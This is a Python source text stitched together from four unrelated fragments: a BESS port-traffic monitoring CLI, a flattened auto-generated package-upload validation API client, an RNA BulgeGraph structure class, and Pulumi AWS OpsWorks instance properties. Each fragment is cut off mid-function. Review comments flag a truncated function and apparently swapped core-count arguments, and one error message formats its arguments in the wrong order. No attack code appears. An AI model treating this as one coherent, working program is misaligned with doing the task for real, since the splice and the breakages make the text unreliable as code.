            out_bytes=(new['out_bytes'] - old['out_bytes']) / sec_diff)

    def print_header(timestamp):
        cli.fout.write('\n')
        cli.fout.write('%-20s%14s%10s%10s%15s%15s%15s%15s%15s%15s '
                       '%14s%10s%10s\n' %
                       (time.strftime('%X') + str(timestamp % 1)[1:8],
                        'INC     Mbps', 'Mpps', 'dropped',
                        'Avg RTT (us)', 'Med RTT (us)', '99th RTT (us)',
                        'Avg Jit (us)', 'Med Jit (us)', '99th Jit (us)',
                        'OUT     Mbps', 'Mpps', 'dropped'))
        cli.fout.write('%s\n' % ('-' * 186))

    def print_footer():
        cli.fout.write('%s\n' % ('-' * 186))

    def print_delta(port, delta, timestamp):
        # Mbps figures add 24 bytes/packet of framing overhead
        # (preamble + IFG + CRC) to the payload byte counts.
        stats = (port,
                 (delta.inc_bytes + delta.inc_packets * 24) * 8 / 1e6,
                 delta.inc_packets / 1e6,
                 delta.inc_dropped,
                 delta.rtt_avg, delta.rtt_med, delta.rtt_99,
                 delta.jitter_avg, delta.jitter_med, delta.jitter_99,
                 (delta.out_bytes + delta.out_packets * 24) * 8 / 1e6,
                 delta.out_packets / 1e6,
                 delta.out_dropped)
        cli.fout.write('%-20s%14.1f%10.3f%10d%15.3f%15.3f%15.3f%15.3f%15.3f'
                       '%15.3f %14.1f%10.3f%10d\n' % stats)
        with open(stats_csv, 'a') as f:
            line = ('%s,%s,%.1f,%.3f,%d,%.3f,%.3f,%.3f,%.3f,%.3f,%.3f,'
                    '%.1f,%.3f,%d\n')
            line %= (datetime.datetime.now().isoformat(),) + stats
            f.write(line)

    def get_total(arr):
        # Element-wise sum of a list of stat dicts (RTT/jitter are summed
        # too; they are only meaningful per-port, the Total row averages
        # them implicitly via get_delta()).
        total = copy.deepcopy(arr[0])
        for stat in arr[1:]:
            total['inc_packets'] += stat['inc_packets']
            total['inc_dropped'] += stat['inc_dropped']
            total['inc_bytes'] += stat['inc_bytes']
            total['rtt_avg'] += stat['rtt_avg']
            total['rtt_med'] += stat['rtt_med']
            total['rtt_99'] += stat['rtt_99']
            total['jitter_avg'] += stat['jitter_avg']
            total['jitter_med'] += stat['jitter_med']
            total['jitter_99'] += stat['jitter_99']
            total['out_packets'] += stat['out_packets']
            total['out_dropped'] += stat['out_dropped']
            total['out_bytes'] += stat['out_bytes']
        return total

    def get_all_stats(cli, sess):
        stats = cli.bess.get_port_stats(sess.port())
        try:
            ret = {
                'inc_packets': stats.inc.packets,
                'out_packets': stats.out.packets,
                'inc_bytes': stats.inc.bytes,
                'out_bytes': stats.out.bytes,
                'inc_dropped': stats.inc.dropped,
                'out_dropped': stats.out.dropped,
                'timestamp': stats.timestamp,
            }
        except Exception:
            # Best-effort: if the daemon returned a malformed reply, report
            # zeros rather than aborting monitoring.  (Narrowed from a bare
            # except so CTRL+C still reaches the outer handler.)
            ret = {
                'inc_packets': 0,
                'out_packets': 0,
                'inc_bytes': 0,
                'out_bytes': 0,
                'inc_dropped': 0,
                'out_dropped': 0,
                'timestamp': time.time(),
            }
        rtt_now = sess.curr_rtt()
        if rtt_now is None:
            rtt_now = {'rtt_avg': 0, 'rtt_med': 0, 'rtt_99': 0,
                       'jitter_avg': 0, 'jitter_med': 0, 'jitter_99': 0}
        ret.update(rtt_now)
        return ret

    all_ports = sorted(cli.bess.list_ports().ports, key=lambda x: x.name)
    drivers = {}
    for port in all_ports:
        drivers[port.name] = port.driver

    if not ports:
        ports = [port.name for port in all_ports]
        if not ports:
            raise cli.CommandError('No port to monitor')

    cli.fout.write('Monitoring ports: %s (Send CTRL + c to stop)\n' %
                   ', '.join(ports))

    last = {}
    now = {}

    # Write a spec comment per port plus a column header before the rows.
    csv_header = '#' + ','.join(['time', 'port', 'inc_mbps', 'inc_mpps',
                                 'inc_dropped', 'avg_rtt_us', 'med_rtt_us',
                                 '99th_rtt_us', 'avg_jit_us', 'med_jit_us',
                                 '99th_jit_us', 'out_mbps', 'out_mpps',
                                 'out_dropped']) + '\n'
    with open(stats_csv, 'a') as f:
        for port in ports:
            line = '#port ' + port + ': '
            line += str(cli.get_session(port).spec()).replace('\n', '; ')
            line = re.sub(r'\s+', ' ', line) + '\n'
            f.write(line)
        f.write(csv_header)

    for port in ports:
        sess = cli.get_session(port)
        last[port] = get_all_stats(cli, sess)

    try:
        while True:
            time.sleep(1)

            for port in ports:
                sess = cli.get_session(port)
                now[port] = get_all_stats(cli, sess)

            print_header(now[port]['timestamp'])

            for port in ports:
                print_delta('%s/%s' % (port, drivers[port]),
                            get_delta(last[port], now[port]),
                            now[port]['timestamp'])

            print_footer()

            if len(ports) > 1:
                print_delta('Total', get_delta(
                    get_total(list(last.values())),
                    get_total(list(now.values()))),
                    now[port]['timestamp'])

            for port in ports:
                last[port] = now[port]
    except KeyboardInterrupt:
        pass


@cmd('monitor port', 'Monitor the current traffic of all ports')
def monitor_port_all(cli):
    _monitor_ports(cli)


@cmd('monitor port PORT...', 'Monitor the current traffic of specified ports')
def monitor_port_all(cli, ports):
    # NOTE(review): intentional name reuse; see show_config_all above.
    _monitor_ports(cli, *ports)


@cmd('set csv CSV', 'Set the CSV file for stats output')
def set_csv(cli, csv):
    global stats_csv
    stats_csv = csv


def _connect_pipeline(cli, pipe):
    """Connect consecutive (module, igate/ogate) pairs into a pipeline."""
    for u, v in zip(pipe, pipe[1:]):
        u[0].connect(v[0], u[1], v[1])


def _create_rate_limit_tree(cli, wid, resource, limit):
    """Add a rate-limit traffic-class for worker *wid*; return its name."""
    rl_name = 'rl_pps_w%d' % (wid,)
    cli.bess.add_tc(rl_name,
                    wid=wid,
                    policy='rate_limit',
                    resource=resource,
                    limit={resource: limit})
    return rl_name


def _create_port_args(cli, port_id, num_rx_cores, num_tx_cores):
    """Build the PMDPort argument dict for *port_id*, merging in any
    per-port overrides from the module-level `ports` map.

    Raises cli.CommandError when *port_id* is unknown.
    """
    global ports
    args = {'driver': None,
            'name': port_id,
            'arg': {'num_inc_q': num_rx_cores,
                    'num_out_q': num_tx_cores,
                    'size_inc_q': 2048,
                    'size_out_q': 2048}}
    args['driver'] = 'PMDPort'
    if port_id not in ports:
        raise cli.CommandError('No such port {}'.format(port_id))
    for k, v in ports[port_id].items():
        args['arg'][k] = v
    return args


def _start(cli, port, mode, tmode, ts):
    # NOTE(review): this function is truncated in the visible source; only
    # the visible fragment is preserved below (the trailing `ret` is the
    # start of a cut-off assignment).
    setup_mclasses(cli, globals())
    # Create the port
    num_tx_cores = len(ts.tx_cores)
    num_rx_cores = len(ts.rx_cores)
    num_cores = num_tx_cores + num_rx_cores
    # NOTE(review): _create_port_args takes (rx, tx) but is called with
    # (tx, rx) here — looks swapped; confirm against the full upstream file.
    port_args = _create_port_args(cli, port, num_tx_cores, num_rx_cores)
    with cli.bess_lock:
        ret
parameter `repo` when calling `packages_validate_upload_docker`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/docker/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_go(self, owner, repo, **kwargs): """ Validate parameters for create Go package Validate parameters for create Go package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_go(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadGo data: :return: None If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_go_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_go_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_go_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create Go package Validate parameters for create Go package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_go_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadGo data: :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_go" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_go`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_go`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/go/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_helm(self, owner, repo, **kwargs): """ Validate parameters for create Helm package Validate parameters for create Helm package This method makes a synchronous HTTP 
request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_helm(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadHelm data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_helm_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_helm_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_helm_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create Helm package Validate parameters for create Helm package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_helm_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadHelm data: :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_helm" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_helm`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_helm`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/helm/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_luarocks(self, owner, repo, **kwargs): """ Validate parameters for create LuaRocks package Validate parameters for create LuaRocks package This method makes a 
synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_luarocks(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadLuarocks data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_luarocks_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_luarocks_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_luarocks_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create LuaRocks package Validate parameters for create LuaRocks package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_luarocks_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadLuarocks data: :return: None If the method is called asynchronously, returns the request thread. 
""" all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_luarocks" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_luarocks`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_luarocks`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/luarocks/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_maven(self, owner, repo, **kwargs): """ Validate parameters for create Maven package Validate parameters for create Maven package This method 
makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_maven(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadMaven data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_maven_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_maven_with_http_info(owner,
bulges += [new_bulge] self.from_stems_and_bulges(stems, bulges) def sort_defines(self): """ Sort the defines of interior loops and stems so that the 5' region is always first. """ for k in self.defines.keys(): d = self.defines[k] if len(d) == 4: if d[0] > d[2]: new_d = [d[2], d[3], d[0], d[1]] self.defines[k] = new_d def to_dotbracket_string(self): """ Convert the BulgeGraph representation to a dot-bracket string and return it. :return: A dot-bracket representation of this BulgeGraph """ pt = self.to_pair_table() return pairtable_to_dotbracket(pt) def sorted_stem_iterator(self): """ Iterate over a list of the stems sorted by the lowest numbered nucleotide in each stem. """ stems = [d for d in self.defines if d[0] == 's'] stems.sort(key=lambda s: self.defines[s][0]) for s in stems: yield s def is_single_stranded(self, node): """ Does this node represent a single-stranded region? Single stranded regions are five-prime and three-prime unpaired regions, multiloops, and hairpins :param node: The name of the node :return: True if yes, False if no """ if node[0] == 'f' or node[0] == 't' or node[0] == 'm' or node[0] == 'h': return True else: return False def get_node_dimensions(self, node): """ Return the dimensions of a node. If the node is a stem, then the dimensions will be l where l is the length of the stem. Otherwise, see get_bulge_dimensions(node) :param node: The name of the node :return: A pair containing its dimensions """ if node[0] == 's': return (self.stem_length(node), self.stem_length(node)) """ return (self.defines[node][1] - self.defines[node][0] + 1, self.defines[node][1] - self.defines[node][0] + 1) """ else: return self.get_bulge_dimensions(node) def adjacent_stem_pairs_iterator(self): """ Iterate over all pairs of stems which are separated by some element. This will always yield triples of the form (s1, e1, s2) where s1 and s2 are the stem identifiers and e1 denotes the element that separates them. 
""" for d in self.defines.keys(): if len(self.edges[d]) == 2: edges = list(self.edges[d]) if edges[0][0] == 's' and edges[1][0] == 's': yield (edges[0], d, edges[1]) def stem_bp_iterator(self, stem): """ Iterate over all the base pairs in the stem. """ d = self.defines[stem] stem_length = self.stem_length(stem) for i in range(stem_length): yield (d[0] + i, d[3] - i) def get_connected_residues(self, s1, s2): """ Get the nucleotides which are connected by the element separating s1 and s2. They should be adjacent stems. The connected nucleotides are those which are spanned by a single interior loop or multiloop. In the case of an interior loop, this function will return a list of two tuples and in the case of multiloops if it will be a list of one tuple. If the two stems are not separated by a single element, then return an empty list. """ # sort the stems according to the number of their first nucleotide stems = [s1, s2] stems.sort(key=lambda x: self.defines[x][0]) c1 = self.edges[s1] c2 = self.edges[s2] # find out which edges they share common_edges = c1.intersection(c2) if len(common_edges) == 0: # not connected return [] if len(common_edges) > 1: raise Exception("Too many connections between the stems") # the element linking the two stems conn = list(common_edges)[0] # find out the sides of the stems that face the bulge (s1b, s1e) = self.get_sides(s1, conn) (s2b, s2e) = self.get_sides(s2, conn) # get the nucleotides on the side facing the stem s1_nucleotides = self.get_side_nucleotides(s1, s1b) s2_nucleotides = self.get_side_nucleotides(s2, s2b) # find out the distances between all the nucleotides flanking # the bulge dists = [] for n1 in s1_nucleotides: for n2 in s2_nucleotides: dists += [(abs(n2 - n1), n1, n2)] dists.sort() # return the ones which are closest to each other if conn[0] == 'i': return sorted([sorted(dists[0][1:]), sorted(dists[1][1:])]) else: return sorted([sorted(dists[0][1:])]) def get_side_nucleotides(self, stem, side): """ Get the nucleotide 
numbers on the given side of them stem. Side 0 corresponds to the 5' end of the stem whereas as side 1 corresponds to the 3' side of the stem. :param stem: The name of the stem :param side: Either 0 or 1, indicating the 5' or 3' end of the stem :return: A tuple of the nucleotide numbers on the given side of the stem. """ if side == 0: return (self.defines[stem][0], self.defines[stem][3]) elif side == 1: return (self.defines[stem][1], self.defines[stem][2]) raise Exception("Invalid side (%d) for the stem (%s)." % (stem, side)) def get_any_sides(self, e1, e2): """ Get the side of e1 that e2 is on. The only difference from the get_sides method is the fact that e1 does not have to be a stem. 0 indicates that e2 is on the side with lower numbered nucleotides and 1 indicates that e2 is on the side with greater nucleotide numbers. :param e1: The name of the first element. :param e2: The name of the second element. :return: A tuple indicating the side of e1 adjacent to e2 and the side of e2 adjacent to e1 """ if e1[0] == 's': return self.get_sides(e1, e2) elif e2[0] == 's': return self.get_sides(e2, e1)[::-1] return None def get_sides(self, s1, b): """ Get the side of s1 that is next to b. s1e -> s1b -> b :param s1: The stem. :param b: The bulge. :return: A tuple indicating which side is the one next to the bulge and which is away from the bulge. """ s1d = self.defines[s1] bd = self.defines[b] # if the bulge is a length 0, multiloop then use the adjacent # stem to determine its side if len(bd) == 0: edges = self.edges[b] for e in edges: if e != s1: bd = self.defines[e] break for i in xrange(4): for k in xrange(len(bd)): if s1d[i] - bd[k] == 1: if i == 0: s1b = 0 break if i == 2: s1b = 1 break elif s1d[i] - bd[k] == -1: if i == 1: s1b = 1 break if i == 3: s1b = 0 break if s1b == 0: s1e = 1 else: s1e = 0 return (s1b, s1e) def get_sides_plus(self, s1, b): """ Get the side of s1 that is next to b. s1e -> s1b -> b :param s1: The stem. :param b: The bulge. 
:return: A tuple indicating the corner of the stem that connects to the bulge as well as the corner of the bulge that connects to the stem. """ s1d = self.defines[s1] bd = self.defines[b] if len(bd) == 0: edges = self.edges[b] for e in edges: if e != s1: bd = self.defines[e] break for k in xrange(len(bd)): # before the stem on the 5' strand if s1d[0] - bd[k] == 1: return (0, k) # after the stem on the 5' strand elif bd[k] - s1d[1] == 1: return (1, k) # before the stem on the 3' strand elif s1d[2] - bd[k] == 1: return (2, k) # after the stem on the 3' strand elif bd[k] - s1d[3] == 1: return (3, k) raise Exception("Faulty multiloop %s connecting %s" % (" ".join(map(str, bd)), " ".join(map(str, s1d)))) def stem_side_vres_to_resn(self, stem, side, vres): """ Return the residue number given the stem name, the strand (side) it's on and the virtual residue number. """ d = self.defines[stem] if side == 0: return d[0] + vres else: return d[3] - vres def stem_iterator(self): """ Iterator over all of the stems in the structure. """ for d in self.defines.keys(): if d[0] == 's': yield d def hloop_iterator(self): """ Iterator over all of the hairpin in the structure. """ for d in self.defines.keys(): if d[0] == 'h': yield d def mloop_iterator(self): """ Iterator over all of the multiloops in the structure. """ for d in self.defines.keys(): if d[0] == 'm': yield d def iloop_iterator(self): """ Iterator over all of the interior loops in the structure. """ for d in self.defines.keys(): if d[0] == 'i': yield d def floop_iterator(self): """ Yield the name of the 5' prime unpaired region if it is present in the structure. """ if 'f1' in self.defines.keys(): yield 'f1'
-> Optional[pulumi.Input[str]]:
        # (fragment) body of the `reported_os_version` getter -- its `def`
        # line lies outside the visible chunk.
        return pulumi.get(self, "reported_os_version")

    @reported_os_version.setter
    def reported_os_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reported_os_version", value)

    @property
    @pulumi.getter(name="rootBlockDevices")
    def root_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceRootBlockDeviceArgs']]]]:
        """
        Customize details about the root block device of the instance. See Block Devices below for details.
        """
        return pulumi.get(self, "root_block_devices")

    @root_block_devices.setter
    def root_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceRootBlockDeviceArgs']]]]):
        pulumi.set(self, "root_block_devices", value)

    @property
    @pulumi.getter(name="rootDeviceType")
    def root_device_type(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the type of root device instances will have by default. Can be either `"ebs"` or `"instance-store"`
        """
        return pulumi.get(self, "root_device_type")

    @root_device_type.setter
    def root_device_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "root_device_type", value)

    @property
    @pulumi.getter(name="rootDeviceVolumeId")
    def root_device_volume_id(self) -> Optional[pulumi.Input[str]]:
        # NOTE(review): undocumented in the generated source -- presumably the
        # provider-reported root EBS volume id; confirm against the schema.
        return pulumi.get(self, "root_device_volume_id")

    @root_device_volume_id.setter
    def root_device_volume_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "root_device_volume_id", value)

    @property
    @pulumi.getter(name="securityGroupIds")
    def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The associated security groups.
        """
        return pulumi.get(self, "security_group_ids")

    @security_group_ids.setter
    def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "security_group_ids", value)

    @property
    @pulumi.getter(name="sshHostDsaKeyFingerprint")
    def ssh_host_dsa_key_fingerprint(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "ssh_host_dsa_key_fingerprint")

    @ssh_host_dsa_key_fingerprint.setter
    def ssh_host_dsa_key_fingerprint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ssh_host_dsa_key_fingerprint", value)

    @property
    @pulumi.getter(name="sshHostRsaKeyFingerprint")
    def ssh_host_rsa_key_fingerprint(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "ssh_host_rsa_key_fingerprint")

    @ssh_host_rsa_key_fingerprint.setter
    def ssh_host_rsa_key_fingerprint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ssh_host_rsa_key_fingerprint", value)

    @property
    @pulumi.getter(name="sshKeyName")
    def ssh_key_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the SSH keypair that instances will have by default.
        """
        return pulumi.get(self, "ssh_key_name")

    @ssh_key_name.setter
    def ssh_key_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ssh_key_name", value)

    @property
    @pulumi.getter(name="stackId")
    def stack_id(self) -> Optional[pulumi.Input[str]]:
        """
        The id of the stack the instance will belong to.
        """
        return pulumi.get(self, "stack_id")

    @stack_id.setter
    def stack_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "stack_id", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        The desired state of the instance. Can be either `"running"` or `"stopped"`.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        Subnet ID to attach to
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter
    def tenancy(self) -> Optional[pulumi.Input[str]]:
        """
        Instance tenancy to use. Can be one of `"default"`, `"dedicated"` or `"host"`
        """
        return pulumi.get(self, "tenancy")

    @tenancy.setter
    def tenancy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenancy", value)

    @property
    @pulumi.getter(name="virtualizationType")
    def virtualization_type(self) -> Optional[pulumi.Input[str]]:
        """
        Keyword to choose what virtualization mode created instances will use. Can be either `"paravirtual"` or `"hvm"`.
        """
        return pulumi.get(self, "virtualization_type")

    @virtualization_type.setter
    def virtualization_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtualization_type", value)


class Instance(pulumi.CustomResource):
    # (fragment) the overloaded __init__ below continues past the end of this
    # chunk; only its leading signature parameters are visible here.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 agent_version: Optional[pulumi.Input[str]] = None,
                 ami_id: Optional[pulumi.Input[str]] = None,
                 architecture: Optional[pulumi.Input[str]] = None,
                 auto_scaling_type: Optional[pulumi.Input[str]] = None,
                 availability_zone: Optional[pulumi.Input[str]] = None,
                 created_at: Optional[pulumi.Input[str]] = None,
                 delete_ebs: Optional[pulumi.Input[bool]] = None,
                 delete_eip: Optional[pulumi.Input[bool]] = None,
                 ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEbsBlockDeviceArgs']]]]] = None,
                 ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 ecs_cluster_arn: Optional[pulumi.Input[str]] = None,
                 elastic_ip: Optional[pulumi.Input[str]] = None,
                 ephemeral_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEphemeralBlockDeviceArgs']]]]] = None,
                 hostname: Optional[pulumi.Input[str]] = None,
                 infrastructure_class: Optional[pulumi.Input[str]] = None,
                 install_updates_on_boot: Optional[pulumi.Input[bool]] = None,
                 instance_profile_arn: Optional[pulumi.Input[str]] = None,
                 instance_type: Optional[pulumi.Input[str]] = None,
                 last_service_error_id: Optional[pulumi.Input[str]] = None,
                 layer_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 os: Optional[pulumi.Input[str]] = None,
                 platform: Optional[pulumi.Input[str]] = None,
                 private_dns: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None,
                 public_dns: Optional[pulumi.Input[str]] = None,
                 public_ip: Optional[pulumi.Input[str]] = None,
                 registered_by: Optional[pulumi.Input[str]] = None,
                 reported_agent_version: Optional[pulumi.Input[str]] = None,
                 reported_os_family: Optional[pulumi.Input[str]] = None,
